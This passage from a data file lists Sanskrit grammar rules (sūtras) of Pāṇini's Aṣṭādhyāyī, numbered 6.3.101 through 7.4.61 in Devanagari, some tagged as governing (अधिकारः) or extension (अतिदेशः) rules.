विभाषा","6.3.101::कोः कत् तत्पुरुषेऽचि","6.3.102::रथवदयोश्च","6.3.103::तृणे च जातौ","6.3.104::का पथ्यक्षयोः","6.3.105::ईषदर्थे","6.3.106::विभाषा पुरुषे","6.3.107::कवं चोष्णे","6.3.108::पथि च च्छन्दसि","6.3.109::पृषोदरादीनि यथोपदिष्टम्","6.3.110::संख्याविसायपूर्वस्याह्नस्याहन्नन्यतरस्यां ङौ","6.3.111::ढ्रलोपे पूर्वस्य दीर्घोऽणः","6.3.112::सहिवहोरोदवर्णस्य","6.3.113::साढ्यै साढ्वा साढेति निगमे","6.3.114:अधिकारः:संहितायाम्","6.3.115::कर्णे लक्षणस्याविष्टाष्टपञ्चमणिभिन्नछिन्नछिद्रस्रुवस्वस्तिकस्य","6.3.116::नहिवृतिवृषिव्यधिरुचिसहितनिषु क्वौ","6.3.117::वनगिर्योः संज्ञायां कोटरकिंशुलकादीनाम्","6.3.118::वले","6.3.119::मतौ बह्वचोऽनजिरादीनाम्","6.3.120::शरादीनां च","6.3.121::इकः वहे अपीलोः","6.3.122::उपसर्गस्य घञ्यमनुष्ये बहुलम्","6.3.123::इकः काशे","6.3.124::दस्ति","6.3.125::अष्टनः संज्ञायाम्","6.3.126::छन्दसि च","6.3.127::चितेः कपि","6.3.128::विश्वस्य वसुराटोः","6.3.129::नरे संज्ञायाम्","6.3.130::मित्रे चर्षौ","6.3.131::मन्त्रे सोमाश्वेन्द्रियविश्वदेव्यस्य मतौ","6.3.132::ओषधेश्च विभक्तावप्रथमायाम्","6.3.133::ऋचि तुनुघमक्षुतङ्कुत्रोरुष्याणाम्","6.3.134::इकः सुञि","6.3.135::द्व्यचोऽतस्तिङः","6.3.136::निपातस्य च","6.3.137::अन्येषामपि दृश्यते","6.3.138::चौ","6.3.139::सम्प्रसारणस्य","6.4.1:अधिकारः:अङ्गस्य","6.4.2::हलः","6.4.3::नामि","6.4.4::न तिसृचतसृ","6.4.5::छन्दस्युभयथा","6.4.6::नृ च","6.4.7::नोपधायाः","6.4.8::सर्वनामस्थाने चासम्बुद्धौ","6.4.9::वा षपूर्वस्य निगमे","6.4.10::सान्तमहतः संयोगस्य","6.4.11::अप्तृन्तृच्स्वसृनप्तृनेष्टृत्वष्टृक्षत्तृहोतृपोतृप्रशास्तॄणाम्","6.4.12::इन्हन्पूषार्यम्णां शौ","6.4.13::सौ च","6.4.14::अत्वसन्तस्य चाधातोः","6.4.15::अनुनासिकस्य क्विझलोः क्ङिति","6.4.16::अज्झनगमां सनि","6.4.17::तनोतेर्विभाषा","6.4.18::क्रमश्च क्त्वि","6.4.19::च्छ्वोः शूडनुनासिके च","6.4.20::ज्वरत्वरश्रिव्यविमवामुपधायाश्च","6.4.21::राल्लोपः","6.4.22:अतिदेशः; अधिकारः:असिद्धवदत्राभात्","6.4.23:अतिदेशः:श्नान्नलोपः","6.4.24:अतिदेशः:अनिदितां हल उपधायाः क्ङिति","6.4.25:अतिदेशः:दन्शसञ्जस्वञ्जां शपि","6.4.26:अतिदेशः:रञ्जेश्च","6.4.27:अतिदेशः:घञि च भावकरणयोः","6.4.28:अतिदेशः:स्यदो जवे","6.4.29:अतिदेशः:अवोदैधौद्मप्रश्रथहिमश्रथाः","6.4.30:अतिदेशः:नाञ्चेः पूजायाम्","6.4.31:अतिदेशः:क्त्वि स्कन्दिस्यन्दोः","6.4.32:अतिदेशः:जान्तनशां विभाषा","6.4.33:अतिदेशः:भञ्जेश्च चिणि","6.4.34:अतिदेशः:शास इदङ्हलोः","6.4.35:अतिदेशः:शा हौ","6.4.36:अतिदेशः:हन्तेर्जः","6.4.37:अतिदेशः:अनुदात्तोपदेशवनतितनोत्यादीनामनुनासिकलोपो झलि क्ङिति","6.4.38:अतिदेशः:वा ल्यपि","6.4.39:अतिदेशः:न क्तिचि दीर्घश्च","6.4.40:अतिदेशः:गमः क्वौ","6.4.41:अतिदेशः:विड्वनोरनुनासिकस्यात्","6.4.42:अतिदेशः:जनसनखनां सञ्झलोः","6.4.43:अतिदेशः:ये विभाषा","6.4.44:अतिदेशः:तनोतेर्यकि","6.4.45:अतिदेशः:सनः क्तिचि लोपश्चास्यान्यतरस्याम्","6.4.46:अतिदेशः; अधिकारः:आर्धधातुके","6.4.47:अतिदेशः:भ्रस्जो रोपधयोः रमन्यतरस्याम्","6.4.48:अतिदेशः:अतो लोपः","6.4.49:अतिदेशः:यस्य हलः","6.4.50:अतिदेशः:क्यस्य विभाषा","6.4.51:अतिदेशः:णेरनिटि","6.4.52:अतिदेशः:निष्ठायां सेटि","6.4.53:अतिदेशः:जनिता मन्त्रे","6.4.54:अतिदेशः:शमिता यज्ञे","6.4.55:अतिदेशः:अयामन्ताल्वाय्येत्न्विष्णुषु","6.4.56:अतिदेशः:ल्यपि लघुपूर्वात्","6.4.57:अतिदेशः:विभाषाऽऽपः","6.4.58:अतिदेशः:युप्लुवोर्दीर्घश्छन्दसि","6.4.59:अतिदेशः:क्षियः","6.4.60:अतिदेशः:निष्ठायां अण्यदर्थे","6.4.61:अतिदेशः:वाऽऽक्रोशदैन्ययोः","6.4.62:अतिदेशः:स्यसिच्सीयुट्तासिषु भावकर्मणोरुपदेशेऽज्झनग्रहदृशां वा चिण्वदिट् च","6.4.63:अतिदेशः:दीङो युडचि क्ङिति","6.4.64:अतिदेशः:आतो लोप इटि च","6.4.65:अतिदेशः:ईद्यति","6.4.66:अतिदेशः:घुमास्थागापाजहातिसां हलि","6.4.67:अतिदेशः:एर्लिङि","6.4.68:अतिदेशः:वाऽन्यस्य संयोगादेः","6.4.69:अतिदेशः:न ल्यपि","6.4.70:अतिदेशः:मयतेरिदन्यतरस्याम्","6.4.71:अतिदेशः:लुङ्लङ्लृङ्क्ष्वडुदात्तः","6.4.72:अतिदेशः:आडजादीनाम्","6.4.73:अतिदेशः:छन्दस्यपि दृश्यते","6.4.74:अतिदेशः:न माङ्योगे","6.4.75:अतिदेशः:बहुलं छन्दस्यमाङ्योगेऽपि","6.4.76:अतिदेशः:इरयो रे","6.4.77:अतिदेशः:अचि श्नुधातुभ्रुवां य्वोरियङुवङौ","6.4.78:अतिदेशः:अभ्यासस्यासवर्णे","6.4.79:अतिदेशः:स्त्रियाः","6.4.80:अतिदेशः:वाऽम्शसोः","6.4.81:अतिदेशः:इणो यण्","6.4.82:अतिदेशः:एरनेकाचोऽसंयोगपूर्वस्य","6.4.83:अतिदेशः:ओः सुपि","6.4.84:अतिदेशः:वर्षाभ्वश्च","6.4.85:अतिदेशः:न भूसुधियोः","6.4.86:अतिदेशः:छन्दस्युभयथा","6.4.87:अतिदेशः:हुश्नुवोः सार्वधातुके","6.4.88:अतिदेशः:भुवो वुग्लुङ्लिटोः","6.4.89:अतिदेशः:ऊदुपधाया गोहः","6.4.90:अतिदेशः:दोषो णौ","6.4.91:अतिदेशः:वा चित्तविरागे","6.4.92:अतिदेशः:मितां ह्रस्वः","6.4.93:अतिदेशः:चिण्णमुलोर्दीर्घोऽन्यतरस्याम्","6.4.94:अतिदेशः:खचि ह्रस्वः","6.4.95:अतिदेशः:ह्लादो निष्ठायाम्","6.4.96:अतिदेशः:छादेर्घेऽद्व्युपसर्गस्य","6.4.97:अतिदेशः:इस्मन्त्रन्क्विषु च","6.4.98:अतिदेशः:गमहनजनखनघसां लोपः क्ङित्यनङि","6.4.99:अतिदेशः:तनिपत्योश्छन्दसि","6.4.100:अतिदेशः:घसिभसोर्हलि च","6.4.101:अतिदेशः:हुझल्भ्यो हेर्धिः","6.4.102:अतिदेशः:श्रुशृणुपॄकृवृभ्यश्छन्दसि","6.4.103:अतिदेशः:अङितश्च","6.4.104:अतिदेशः:चिणो लुक्","6.4.105:अतिदेशः:अतो हेः","6.4.106:अतिदेशः:उतश्च प्रत्ययादसंयोगपूर्वात्","6.4.107:अतिदेशः:लोपश्चास्यान्यतरस्यां म्वोः","6.4.108:अतिदेशः:नित्यं करोतेः","6.4.109:अतिदेशः:ये च","6.4.110:अतिदेशः:अत उत् सार्वधातुके","6.4.111:अतिदेशः:श्नसोरल्लोपः","6.4.112:अतिदेशः:श्नाऽभ्यस्तयोरातः","6.4.113:अतिदेशः:ई हल्यघोः","6.4.114:अतिदेशः:इद्दरिद्रस्य","6.4.115:अतिदेशः:भियोऽन्यतरस्याम्","6.4.116:अतिदेशः:जहातेश्च","6.4.117:अतिदेशः:आ च हौ","6.4.118:अतिदेशः:लोपो यि","6.4.119:अतिदेशः:घ्वसोरेद्धावभ्यासलोपश्च","6.4.120:अतिदेशः:अत एकहल्मध्येऽनादेशादेर्लिटि","6.4.121:अतिदेशः:थलि च सेटि","6.4.122:अतिदेशः:तॄफलभजत्रपश्च","6.4.123:अतिदेशः:राधो हिंसायाम्","6.4.124:अतिदेशः:वा जॄभ्रमुत्रसाम्","6.4.125:अतिदेशः:फणां च सप्तानाम्","6.4.126:अतिदेशः:न शसददवादिगुणानाम्","6.4.127:अतिदेशः:अर्वणस्त्रसावनञः","6.4.128:अतिदेशः:मघवा बहुलम्","6.4.129:अतिदेशः; अधिकारः:भस्य","6.4.130:अतिदेशः:पादः पत्","6.4.131:अतिदेशः:वसोः सम्प्रसारणम्","6.4.132:अतिदेशः:वाह ऊठ्","6.4.133:अतिदेशः:श्वयुवमघोनामतद्धिते","6.4.134:अतिदेशः:अल्लोपोऽनः","6.4.135:अतिदेशः:षपूर्वहन्धृतराज्ञामणि","6.4.136:अतिदेशः:विभाषा ङिश्योः","6.4.137:अतिदेशः:न संयोगाद्वमन्तात्","6.4.138:अतिदेशः:अचः","6.4.139:अतिदेशः:उद ईत्","6.4.140:अतिदेशः:आतो धातोः","6.4.141:अतिदेशः:मन्त्रेष्वाङ्यादेरात्मनः","6.4.142:अतिदेशः:ति विंशतेर्डिति","6.4.143:अतिदेशः:टेः","6.4.144:अतिदेशः:नस्तद्धिते","6.4.145:अतिदेशः:अह्नष्टखोरेव","6.4.146:अतिदेशः:ओर्गुणः","6.4.147:अतिदेशः:ढे लोपोऽकद्र्वाः","6.4.148:अतिदेशः:यस्येति च","6.4.149:अतिदेशः:सूर्यतिष्यागस्त्यमत्स्यानां य उपधायाः","6.4.150:अतिदेशः:हलस्तद्धितस्य","6.4.151:अतिदेशः:आपत्यस्य च तद्धितेऽनाति","6.4.152:अतिदेशः:क्यच्व्योश्च","6.4.153:अतिदेशः:बिल्वकादिभ्यश्छस्य लुक्","6.4.154:अतिदेशः:तुरिष्ठेमेयस्सु","6.4.155:अतिदेशः:टेः","6.4.156:अतिदेशः:स्थूलदूरयुवह्रस्वक्षिप्रक्षुद्राणां यणादिपरं पूर्वस्य च गुणः","6.4.157:अतिदेशः:प्रियस्थिरस्फिरोरुबहुलगुरुवृद्धतृप्रदीर्घवृन्दारकाणां प्रस्थस्फवर्बंहिगर्वर्षित्रब्द्राघिवृन्दाः","6.4.158:अतिदेशः:बहोर्लोपो भू च बहोः","6.4.159:अतिदेशः:इष्ठस्य यिट् च","6.4.160:अतिदेशः:ज्यादादीयसः","6.4.161:अतिदेशः:र ऋतो हलादेर्लघोः","6.4.162:अतिदेशः:विभाषर्जोश्छन्दसि","6.4.163:अतिदेशः:प्रकृत्यैकाच्","6.4.164:अतिदेशः:इनण्यनपत्ये","6.4.165:अतिदेशः:गाथिविदथिकेशिगणिपणिनश्च","6.4.166:अतिदेशः:संयोगादिश्च","6.4.167:अतिदेशः:अन्","6.4.168:अतिदेशः:ये चाभावकर्मणोः","6.4.169:अतिदेशः:आत्माध्वानौ खे","6.4.170:अतिदेशः:न मपूर्वोऽपत्येऽवर्मणः","6.4.171:अतिदेशः:ब्राह्मोअजातौ","6.4.172:अतिदेशः:कार्मस्ताच्छील्ये","6.4.173:अतिदेशः:औक्षमनपत्ये","6.4.174:अतिदेशः:दाण्डिनायनहास्तिनायनाथर्वणिकजैह्माशिनेयवाशिनायनिभ्रौणहत्यधैवत्यसारवैक्ष्वाकमैत्रेयहिरण्मयानि","6.4.175:अतिदेशः:ऋत्व्यवास्त्व्यवास्त्वमाध्वीहिरण्ययानि च्छन्दसि","7.1.1::युवोरनाकौ","7.1.2::आयनेयीनीयियः फढखच्छघां प्रत्ययादीनाम्","7.1.3::झोऽन्तः","7.1.4::अदभ्यस्तात्","7.1.5::आत्मनेपदेष्वनतः","7.1.6::शीङो रुट्","7.1.7::वेत्तेर्विभाषा","7.1.8::बहुलं छन्दसि","7.1.9::अतो भिस ऐस्","7.1.10::बहुलं छन्दसि","7.1.11::नेदमदसोरकोः","7.1.12::टाङसिङसामिनात्स्याः","7.1.13::ङेर्यः","7.1.14::सर्वनाम्नः स्मै","7.1.15::ङसिङ्योः स्मात्स्मिनौ","7.1.16::पूर्वादिभ्यो नवभ्यो वा","7.1.17::जसः शी","7.1.18::औङ आपः","7.1.19::नपुंसकाच्च","7.1.20::जश्शसोः शिः","7.1.21::अष्टाभ्य औश्","7.1.22::षड्भ्यो लुक्","7.1.23::स्वमोर्नपुंसकात्","7.1.24::अतोऽम्","7.1.25::अद्ड् डतरादिभ्यः पञ्चभ्यः","7.1.26::नेतराच्छन्दसि","7.1.27::युष्मदस्मद्भ्यां ङसोऽश्","7.1.28::ङे प्रथमयोरम्","7.1.29::शसो न","7.1.30::भ्यसो भ्यम्","7.1.31::पञ्चम्या अत्","7.1.32::एकवचनस्य च","7.1.33::साम आकम्","7.1.34::आत औ णलः","7.1.35::तुह्योस्तातङाशिष्यन्यतरस्याम्","7.1.36::विदेः शतुर्वसुः","7.1.37::समासेऽनञ्पूर्वे क्त्वो ल्यप्","7.1.38::क्त्वाऽपि छन्दसि","7.1.39::सुपां सुलुक्पूर्वसवर्णाऽऽच्छेयाडाड्यायाजालः","7.1.40::अमो मश्","7.1.41::लोपस्त आत्मनेपदेषु","7.1.42::ध्वमो ध्वात्","7.1.43::यजध्वैनमिति च","7.1.44::तस्य तात्","7.1.45::तप्तनप्तनथनाश्च","7.1.46::इदन्तो मसि","7.1.47::क्त्वो यक्","7.1.48::इष्ट्वीनमिति च","7.1.49::स्नात्व्यादयश्च","7.1.50::आज्जसेरसुक्","7.1.51::अश्वक्षीरवृषलवणानामात्मप्रीतौ क्यचि","7.1.52::आमि सर्वनाम्नः सुट्","7.1.53::त्रेस्त्रयः","7.1.54::ह्रस्वनद्यापो नुट्","7.1.55::षट्चतुर्भ्यश्च","7.1.56::श्रीग्रामण्योश्छन्दसि","7.1.57::गोः पादान्ते","7.1.58::इदितो नुम् धातोः","7.1.59::शे मुचादीनाम्","7.1.60::मस्जिनशोर्झलि","7.1.61::रधिजभोरचि","7.1.62::नेट्यलिटि रधेः","7.1.63::रभेरशब्लिटोः","7.1.64::लभेश्च","7.1.65::आङो यि","7.1.66::उपात् प्रशंसायाम्","7.1.67::उपसर्गात् खल्घञोः","7.1.68::न सुदुर्भ्यां केवलाभ्याम्","7.1.69::विभाषा चिण्णमुलोः","7.1.70::उगिदचां सर्वनामस्थानेऽधातोः","7.1.71::युजेरसमासे","7.1.72::नपुंसकस्य झलचः","7.1.73::इकोऽचि विभक्तौ","7.1.74::तृतीयाऽऽदिषु भाषितपुंस्कं पुंवद्गालवस्य","7.1.75::अस्थिदधिसक्थ्यक्ष्णामनङुदात्तः","7.1.76::छन्दस्यपि दृश्यते","7.1.77::ई च द्विवचने","7.1.78::नाभ्यस्ताच्छतुः","7.1.79::वा नपुंसकस्य","7.1.80::आच्छीनद्योर्नुम्","7.1.81::शप्श्यनोर्नित्यम्","7.1.82::सावनडुहः","7.1.83::दृक्स्ववस्स्वतवसां छन्दसि","7.1.84::दिव औत्","7.1.85::पथिमथ्यृभुक्षामात्","7.1.86::इतोऽत् सर्वनामस्थाने","7.1.87::थो न्थः","7.1.88::भस्य टेर्लोपः","7.1.89::पुंसोऽसुङ्","7.1.90:अतिदेशः:गोतो णित्","7.1.91:अतिदेशः:णलुत्तमो वा","7.1.92:अतिदेशः:सख्युरसम्बुद्धौ","7.1.93::अनङ् सौ","7.1.94::ऋदुशनस्पुरुदंसोऽनेहसां च","7.1.95:अतिदेशः:तृज्वत् क्रोष्टुः","7.1.96::स्त्रियां च","7.1.97::विभाषा तृतीयाऽऽदिष्वचि","7.1.98::चतुरनडुहोरामुदात्तः","7.1.99::अम् सम्बुद्धौ","7.1.100::ॠत इद्धातोः","7.1.101::उपधायाश्च","7.1.102::उदोष्ठ्यपूर्वस्य","7.1.103::बहुलं छन्दसि","7.2.1::सिचि वृद्धिः परस्मैपदेषु","7.2.2::अतो र्लान्तस्य","7.2.3::वदव्रजहलन्तस्याचः","7.2.4::नेटि","7.2.5::ह्म्यन्तक्षणश्वसजागृणिश्व्येदिताम्","7.2.6::ऊर्णोतेर्विभाषा","7.2.7::अतो हलादेर्लघोः","7.2.8::नेड् वशि कृति","7.2.9::तितुत्रतथसिसुसरकसेषु च","7.2.10::एकाच उपदेशेऽनुदात्तात्","7.2.11::श्र्युकः किति","7.2.12::सनि ग्रहगुहोश्च","7.2.13::कृसृभृवृस्तुद्रुस्रुश्रुवो लिटि","7.2.14::श्वीदितो निष्ठायाम्","7.2.15::यस्य विभाषा","7.2.16::आदितश्च","7.2.17::विभाषा भावादिकर्मणोः","7.2.18::क्षुब्धस्वान्तध्वान्तलग्नम्लिष्टविरिब्धफाण्टबाढानि मन्थमनस्तमःसक्ताविस्पष्टस्वरानायासभृशेषु","7.2.19:अधिकारः:धृषिशसी वैयात्ये","7.2.20::दृढः स्थूलबलयोः","7.2.21::प्रभौ परिवृढः","7.2.22::कृच्छ्रगहनयोः कषः","7.2.23::घुषिरविशब्दने","7.2.24::अर्देः संनिविभ्यः","7.2.25::अभेश्चाविदूर्ये","7.2.26::णेरध्ययने वृत्तम्","7.2.27::वा दान्तशान्तपूर्णदस्तस्पष्टच्छन्नज्ञप्ताः","7.2.28::रुष्यमत्वरसंघुषास्वनाम्","7.2.29::हृषेर्लोमसु","7.2.30::अपचितश्च","7.2.31::ह्रु ह्वरेश्छन्दसि","7.2.32::अपरिह्वृताश्च","7.2.33::सोमे ह्वरितः","7.2.34::ग्रसितस्कभितस्तभितोत्तभितचत्तविकस्तविशस्तॄशंस्तृशास्तृतरुतृतरूतृवरुतृवरूतृवरुत्रीरुज्ज्वलितिक्षरितिक्षमितिवमित्यमितीति च","7.2.35::आर्धधातुकस्येड् वलादेः","7.2.36::स्नुक्रमोरनात्मनेपदनिमित्ते","7.2.37::ग्रहोऽलिटि दीर्घः","7.2.38::वॄतो वा","7.2.39::न लिङि","7.2.40::सिचि च परस्मैपदेषु","7.2.41::इट् सनि वा","7.2.42::लिङ्सिचोरात्मनेपदेषु","7.2.43::ऋतश्च संयोगादेः","7.2.44::स्वरतिसूतिसूयतिधूञूदितो वा","7.2.45::रधादिभ्यश्च","7.2.46::निरः कुषः","7.2.47::इण्निष्ठायाम्","7.2.48::तीषसहलुभरुषरिषः","7.2.49::सनीवन्तर्धभ्रस्जदम्भुश्रिस्वृयूर्णुभरज्ञपिसनाम्","7.2.50::क्लिशः क्त्वानिष्ठयोः","7.2.51::पूङश्च","7.2.52::वसतिक्षुधोरिट्","7.2.53::अञ्चेः पूजायाम्","7.2.54::लुभो विमोचने","7.2.55::जॄव्रश्च्योः क्त्वि","7.2.56::उदितो वा","7.2.57::सेऽसिचि कृतचृतच्छृदतृदनृतः","7.2.58::गमेरिट् परस्मैपदेषु","7.2.59::न वृद्भ्यश्चतुर्भ्यः","7.2.60::तासि च कॢपः","7.2.61::अचस्तास्वत् थल्यनिटो नित्यम्","7.2.62::उपदेशेऽत्वतः","7.2.63::ऋतो भारद्वाजस्य","7.2.64::बभूथाततन्थजगृम्भववर्थेति निगमे","7.2.65::विभाषा सृजिदृषोः","7.2.66::इडत्त्यर्तिव्ययतीनाम्","7.2.67::वस्वेकाजाद्घसाम्","7.2.68::विभाषा गमहनविदविशाम्","7.2.69::सनिंससनिवांसम्","7.2.70::ऋद्धनोः स्ये","7.2.71::अञ्जेः सिचि","7.2.72::स्तुसुधूञ्भ्यः परस्मैपदेषु","7.2.73::यमरमनमातां सक् च","7.2.74::स्मिपूङ्रञ्ज्वशां सनि","7.2.75::किरश्च पञ्चभ्यः","7.2.76::रुदादिभ्यः सार्वधातुके","7.2.77::ईशः से","7.2.78::ईडजनोर्ध्वे च","7.2.79::लिङः सलोपोऽनन्त्यस्य","7.2.80::अतो येयः","7.2.81::आतो ङितः","7.2.82::आने मुक्","7.2.83::ईदासः","7.2.84::अष्टन आ विभक्तौ","7.2.85::रायो हलि","7.2.86::युष्मदस्मदोरनादेशे","7.2.87::द्वितीयायां च","7.2.88::प्रथमायाश्च द्विवचने भाषायाम्","7.2.89::योऽचि","7.2.90::शेषे लोपः","7.2.91::मपर्यन्तस्य","7.2.92::युवावौ द्विवचने","7.2.93::यूयवयौ जसि","7.2.94::त्वाहौ सौ","7.2.95::तुभ्यमह्यौ ङयि","7.2.96::तवममौ ङसि","7.2.97::त्वमावेकवचने","7.2.98::प्रतयोत्तरपदयोश्च","7.2.99::त्रिचतुरोः स्त्रियां तिसृचतसृ","7.2.100::अचि र ऋतः","7.2.101::जराया जरसन्यतरस्याम्","7.2.102::त्यदादीनामः","7.2.103::किमः कः","7.2.104::कु तिहोः","7.2.105::क्वाति","7.2.106::तदोः सः सावनन्त्ययोः","7.2.107::अदस औ सुलोपश्च","7.2.108::इदमो मः","7.2.109::दश्च","7.2.110::यः सौ","7.2.111::इदोऽय् पुंसि","7.2.112::अनाप्यकः","7.2.113::हलि लोपः","7.2.114::मृजेर्वृद्धिः","7.2.115::अचो ञ्णिति","7.2.116::अत उपधायाः","7.2.117::तद्धितेष्वचामादेः","7.2.118::किति च","7.3.1::देविकाशिंशपादित्यवाड्दीर्घसत्रश्रेयसामात्","7.3.2::केकयमित्त्रयुप्रलयानां यादेरियः","7.3.3::न य्वाभ्यां पदान्ताभ्याम् पूर्वौ तु ताभ्यामैच्","7.3.4::द्वारादीनां च","7.3.5::न्यग्रोधस्य च केवलस्य","7.3.6::न कर्मव्यतिहारे","7.3.7::स्वागतादीनां च","7.3.8::श्वादेरिञि","7.3.9::पदान्तस्यान्यतरस्याम्","7.3.10:अधिकारः:उत्तरपदस्य","7.3.11::अवयवादृतोः","7.3.12::सुसर्वार्धाज्जनपदस्य","7.3.13::दिशोऽमद्राणाम्","7.3.14::प्राचां ग्रामनगराणाम्","7.3.15::संख्यायाः संवत्सरसंख्यस्य च","7.3.16::वर्षस्याभविष्यति","7.3.17::परिमाणान्तस्यासंज्ञाशाणयोः","7.3.18::जे प्रोष्ठपदानाम्","7.3.19::हृद्भगसिन्ध्वन्ते पूर्वपदस्य च","7.3.20::अनुशतिकादीनां च","7.3.21::देवताद्वंद्वे च","7.3.22::नेन्द्रस्य परस्य","7.3.23::दीर्घाच्च वरुणस्य","7.3.24::प्राचां नगरान्ते","7.3.25::जङ्गलधेनुवलजान्तस्य विभाषितमुत्तरम्","7.3.26::अर्धात् परिमाणस्य पूर्वस्य तु वा","7.3.27::नातः परस्य","7.3.28::प्रवाहणस्य ढे","7.3.29::तत्प्रत्ययस्य च","7.3.30::नञः शुचीश्वरक्षेत्रज्ञकुशलनिपुणानाम्","7.3.31::यथातथयथापुरयोः पर्यायेण","7.3.32::हनस्तोऽचिण्णलोः","7.3.33::आतो युक् चिण्कृतोः","7.3.34::नोदात्तोपदेशस्य मान्तस्यानाचमेः","7.3.35::जनिवध्योश्च","7.3.36::अर्त्तिह्रीब्लीरीक्नूयीक्ष्माय्यातां पुङ्णौ","7.3.37::शाच्छासाह्वाव्यावेपां युक्","7.3.38::वो विधूनने जुक्","7.3.39::लीलोर्नुग्लुकावन्यतरस्यां स्नेहविपातने","7.3.40::भियो हेतुभये षुक्","7.3.41::स्फायो वः","7.3.42::शदेरगतौ तः","7.3.43::रुहः पोऽन्यतरस्याम्","7.3.44::प्रत्ययस्थात् कात् पूर्वस्यात इदाप्यसुपः","7.3.45::न यासयोः","7.3.46::उदीचामातः स्थाने यकपूर्वायाः","7.3.47::भस्त्रैषाऽजाज्ञाद्वास्वानञ्पूर्वाणामपि","7.3.48::अभाषितपुंस्काच्च","7.3.49::आदाचार्याणाम्","7.3.50::ठस्येकः","7.3.51::इसुसुक्तान्तात् कः","7.3.52::चजोः कु घिन्ण्यतोः","7.3.53::न्यङ्क्वादीनां च","7.3.54::हो हन्तेर्ञ्णिन्नेषु","7.3.55::अभ्यासाच्च","7.3.56::हेरचङि","7.3.57::सन्लिटोर्जेः","7.3.58::विभाषा चेः","7.3.59::न क्वादेः","7.3.60::अजिवृज्योश्च","7.3.61::भुजन्युब्जौ पाण्युपतापयोः","7.3.62::प्रयाजानुयाजौ यज्ञाङ्गे","7.3.63::वञ्चेर्गतौ","7.3.64::ओक उचः के","7.3.65::ण्य आवश्यके","7.3.66::यजयाचरुचप्रवचर्चश्च","7.3.67::वचोऽशब्दसंज्ञायाम्","7.3.68::प्रयोज्यनियोज्यौ शक्यार्थे","7.3.69::भोज्यं भक्ष्ये","7.3.70::घोर्लोपो लेटि वा","7.3.71::ओतः श्यनि","7.3.72::क्सस्याचि","7.3.73::लुग्वा दुहदिहलिहगुहामात्मनेपदे दन्त्ये","7.3.74::शमामष्टानां दीर्घः श्यनि","7.3.75::ष्ठिवुक्लम्याचमां शिति","7.3.76::क्रमः परस्मैपदेषु","7.3.77::इषुगमियमां छः","7.3.78::पाघ्राध्मास्थाम्नादाण्दृश्यर्त्तिसर्त्तिशदसदां पिबजिघ्रधमतिष्ठमनयच्छपश्यर्च्छधौशीयसीदाः","7.3.79::ज्ञाजनोर्जा","7.3.80::प्वादीनां ह्रस्वः","7.3.81::मीनातेर्निगमे","7.3.82::मिदेर्गुणः","7.3.83::जुसि च","7.3.84::सार्वधातुकार्धधातुकयोः","7.3.85::जाग्रोऽविचिण्णल्ङित्सु","7.3.86::पुगन्तलघूपधस्य च","7.3.87::नाभ्यस्तस्याचि पिति सार्वधातुके","7.3.88::भूसुवोस्तिङि","7.3.89::उतो वृद्धिर्लुकि हलि","7.3.90::ऊर्णोतेर्विभाषा","7.3.91::गुणोऽपृक्ते","7.3.92::तृणह इम्","7.3.93::ब्रुव ईट्","7.3.94::यङो वा","7.3.95::तुरुस्तुशम्यमः सार्वधातुके","7.3.96::अस्तिसिचोऽपृक्ते","7.3.97::बहुलं छन्दसि","7.3.98::रुदश्च पञ्चभ्यः","7.3.99::अड्गार्ग्यगालवयोः","7.3.100::अदः सर्वेषाम्","7.3.101::अतो दीर्घो यञि","7.3.102::सुपि च","7.3.103::बहुवचने झल्येत्","7.3.104::ओसि च","7.3.105::आङि चापः","7.3.106::सम्बुद्धौ च","7.3.107::अम्बाऽर्थनद्योर्ह्रस्वः","7.3.108::ह्रस्वस्य गुणः","7.3.109::जसि च","7.3.110::ऋतो ङिसर्वनामस्थानयोः","7.3.111::घेर्ङिति","7.3.112::आण्नद्याः","7.3.113::याडापः","7.3.114::सर्वनाम्नः स्याड्ढ्रस्वश्च","7.3.115::विभाषा द्वितीयातृतीयाभ्याम्","7.3.116::ङेराम्नद्याम्नीभ्यः","7.3.117::इदुद्भ्याम्","7.3.118::औत्","7.3.119::अच्च घेः","7.3.120::आङो नाऽस्त्रियाम्","7.4.1::णौ चङ्युपधाया ह्रस्वः","7.4.2::नाग्लोपिशास्वृदिताम्","7.4.3::भ्राजभासभाषदीपजीवमीलपीडामन्यतरस्याम्","7.4.4::लोपः पिबतेरीच्चाभ्यासस्य","7.4.5::तिष्ठतेरित्","7.4.6::जिघ्रतेर्वा","7.4.7::उर्ऋत्","7.4.8::नित्यं छन्दसि","7.4.9::दयतेर्दिगि लिटि","7.4.10::ऋतश्च संयोगादेर्गुणः","7.4.11::ऋच्छत्यॄताम्","7.4.12::शृदॄप्रां ह्रस्वो वा","7.4.13::केऽणः","7.4.14::न कपि","7.4.15::आपोऽन्यतरस्याम्","7.4.16::ऋदृशोऽङि गुणः","7.4.17::अस्यतेस्थुक्","7.4.18::श्वयतेरः","7.4.19::पतः पुम्","7.4.20::वच उम्","7.4.21::शीङः सार्वधातुके गुणः","7.4.22::अयङ् यि क्ङिति","7.4.23::उपसर्गाद्ध्रस्व ऊहतेः","7.4.24::एतेर्लिङि","7.4.25::अकृत्सार्वधातुकयोर्दीर्घः","7.4.26::च्वौ च","7.4.27::रीङ् ऋतः","7.4.28::रिङ् शयग्लिङ्क्षु","7.4.29::गुणोऽर्तिसंयोगाद्योः","7.4.30::यङि च","7.4.31::ई घ्राध्मोः","7.4.32::अस्य च्वौ","7.4.33::क्यचि च","7.4.34::अशनायोदन्यधनाया बुभुक्षापिपासागर्द्धेषु","7.4.35::न च्छन्दस्यपुत्रस्य","7.4.36::दुरस्युर्द्रविणस्युर्वृषण्यतिरिषण्यति","7.4.37::अश्वाघस्यात्","7.4.38::देवसुम्नयोर्यजुषि काठके","7.4.39::कव्यध्वरपृतनस्यर्चि लोपः","7.4.40::द्यतिस्यतिमास्थामित्ति किति","7.4.41::शाछोरन्यतरस्याम्","7.4.42::दधातेर्हिः","7.4.43::जहातेश्च क्त्वि","7.4.44::विभाषा छन्दसि","7.4.45::सुधितवसुधितनेमधितधिष्वधिषीय च","7.4.46::दो दद् घोः","7.4.47::अच उपसर्गात्तः","7.4.48::अपो भि","7.4.49::सः स्यार्द्धधातुके","7.4.50::तासस्त्योर्लोपः","7.4.51::रि च","7.4.52::ह एति","7.4.53::यीवर्णयोर्दीधीवेव्योः","7.4.54::सनि मीमाघुरभलभशकपतपदामच इस्","7.4.55::आप्ज्ञप्यृधामीत्","7.4.56::दम्भ इच्च","7.4.57::मुचोऽकर्मकस्य गुणो वा","7.4.58::अत्र लोपोऽभ्यासस्य","7.4.59::ह्रस्वः","7.4.60::हलादिः शेषः","7.4.61::शर्पूर्वाः 